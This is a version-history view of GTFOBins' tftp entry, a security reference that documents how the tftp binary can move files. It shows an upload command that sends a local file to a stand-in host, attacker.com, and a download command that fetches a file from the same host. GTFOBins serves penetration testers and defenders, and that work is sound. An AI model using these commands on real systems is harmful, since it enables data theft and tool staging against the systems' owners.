GTFOBins.github.io/_gtfobins/tftp.md

15 lines
323 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
2018-05-24 21:59:21 +02:00
RHOST=attacker.com
2018-05-21 21:14:41 +02:00
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
2018-05-24 21:59:21 +02:00
RHOST=attacker.com
2018-05-21 21:14:41 +02:00
tftp $RHOST
get file_to_get
---